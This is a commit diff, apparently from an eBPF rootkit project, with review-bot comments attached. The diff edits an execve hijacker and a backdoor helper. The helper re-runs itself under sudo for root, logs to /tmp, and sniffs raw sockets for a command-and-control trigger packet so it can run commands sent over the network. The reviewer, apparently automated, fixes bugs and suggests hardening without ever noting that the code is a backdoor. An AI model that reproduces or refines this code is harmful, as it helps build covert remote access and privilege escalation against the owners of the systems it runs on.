Corrected issues of opening directories without permission in execve helper

This commit is contained in:
h3xduck
2022-02-24 19:53:11 -05:00
parent b182ac1eeb
commit 805fa760cf
7 changed files with 1090 additions and 1086 deletions





@@ -168,7 +168,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
return -1; return -1;
} }
hijacker_state = 1; //hijacker_state = 1;
unsigned char newfilename[ARGUMENT_LENGTH] = {0}; unsigned char newfilename[ARGUMENT_LENGTH] = {0};
unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0}; unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};
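Review bot: The assignment `hijacker_state = 1;` appears to be disabled by commenting it out rather than removed, which leaves dead code with no record of why the state is no longer set. If the flag is meant to stay off, delete the line; if it is a temporary switch, a short comment such as `// hijacker_state intentionally left unset: <reason>` tells the next reader what to expect. handle_tp_sys_enter_execve starts before this hunk and continues after it, so whether newfilename and newargv are still consumed when the state is not set cannot be seen here.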



@@ -78,11 +78,30 @@ int main(int argc, char* argv[], char *envp[]){
timeinfo = localtime ( &rawtime ); timeinfo = localtime ( &rawtime );
char* timestr = asctime(timeinfo); char* timestr = asctime(timeinfo);
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = argv[0];
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
if(execve("/usr/bin/sudo", args, envp)<0){
perror("Failed to execve()");
exit(-1);
}
}
//We proceed to fork() and exec the original program, whilst also executing the one we //We proceed to fork() and exec the original program, whilst also executing the one we
//ordered to execute via the network backdoor //ordered to execute via the network backdoor
//int bpf_map_fd = bpf_map_get_fd_by_id() //int bpf_map_fd = bpf_map_get_fd_by_id()
int fd = open("/home/osboxes/TFG/src/log", O_RDWR | O_CREAT | O_TRUNC, 0666); int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666);
if(fd<0){
perror("Failed to open log file");
//return -1;
}
int ii = 0; int ii = 0;
while(*(timestr+ii)!='\0'){ while(*(timestr+ii)!='\0'){
@@ -100,18 +119,6 @@ int main(int argc, char* argv[], char *envp[]){
write(fd, "\n", 1); write(fd, "\n", 1);
write(fd, "Sniffing...\n", 13); write(fd, "Sniffing...\n", 13);
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = argv[0];
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
if(execve("/usr/bin/sudo", args, envp)<0){
perror("Failed to execve()");
exit(-1);
}
}
packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN); packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
if(packet.ipheader == NULL){ if(packet.ipheader == NULL){
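Review bot: The argv array built for execve in the `geteuid() != 0` block is not NULL-terminated: `char* args[argc+1]` is filled in slots 0 through argc by the copy loop, so execve reads one element past the end of the array. Declare it as `char* args[argc+2];` and add `args[argc+1] = NULL;` after the loop. Further down, when `open("/tmp/rootlog", ...)` fails the `//return -1;` is commented out, so the following `write(fd, ...)` calls run with fd == -1 and fail silently; either return there or guard the log writes on `fd >= 0`. A fixed path in a shared directory created with mode 0666 by a process that has just re-executed itself under sudo is the classic insecure temporary-file pattern; prefer a restrictive mode such as 0600 together with `O_NOFOLLOW` or `O_EXCL` so a pre-existing file or symlink at that path is not silently reused. main() continues past the end of this hunk.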
